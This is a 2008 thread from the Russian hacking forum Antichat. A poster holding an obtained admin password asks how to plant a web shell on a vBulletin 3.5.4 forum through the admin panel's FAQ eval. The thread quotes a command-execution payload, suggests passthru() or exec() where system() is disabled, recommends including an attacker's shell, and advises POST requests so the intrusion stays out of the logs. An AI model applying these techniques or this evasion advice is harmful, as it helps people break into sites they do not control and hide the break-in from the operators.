Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   vBulletin 3.5.4 -Заливка Shell'а через admincp (https://forum.antichat.xyz/showthread.php?t=58945)

Tor_Zoom 17.01.2008 05:56

vBulletin 3.5.4 -Заливка Shell'а через admincp
 
Движёк:
vBulletin 3.5.4 -(добыт пасс в админ панель)
Система:
Linux,Сервер Apache v2.2.6, PHP 5.2.4, Версия MySQL 5.0.45.

Вся трабла в том,что есть(добыт) админ пасс в админ панель на форум.Пытался залить шелл через модуль "faq_complite" но не вышло.

Прописывал echo('hek'); -прокатывало-появлялось на faq.php,но если прописать system($_GET["c"]); -выдаёт ошибку(Fatal error: Call to undefined function sistem() in /home/имя папки/public_html/forum/faq.php(303) : eval()'d code on line 1).
Также пробывал includ - что-то типа include($file); -Тоже выдовало ошибку.......

Я так понимаю,что бага то не пофиксинa-дело в PHP5 или в настройках Apache....

Как это обойти?Вообще мне требуется лишь узнать,какие файлы находятся в определённой папке-название папки я знаю,но там .htaccess.

Возможно ли мне как-нибудь просмотреть папку в данном случае?

n0ne 17.01.2008 10:18

Возможно просто system() запрещено настройками, пробуй passthru(), open_basedir(), exec() и т.п. . А вообще хороший вариант попробовать include() своего шелла, а там уже посмотришь какие функции отключены, да и удобнее.

GSM™ 19.01.2008 11:22

а через modcp можно шелла залить?
vBulletin 3.5.1

Doom123 19.01.2008 13:25

Цитата:

Fatal error: Call to undefined function sistem()
Это опечатка или там так и было написано sistem()?

SanyaX 19.01.2008 17:21

Проще всего через include. И метод ставить не GET а POST. Т.к в логах гет запросами палятся.


Время: 03:38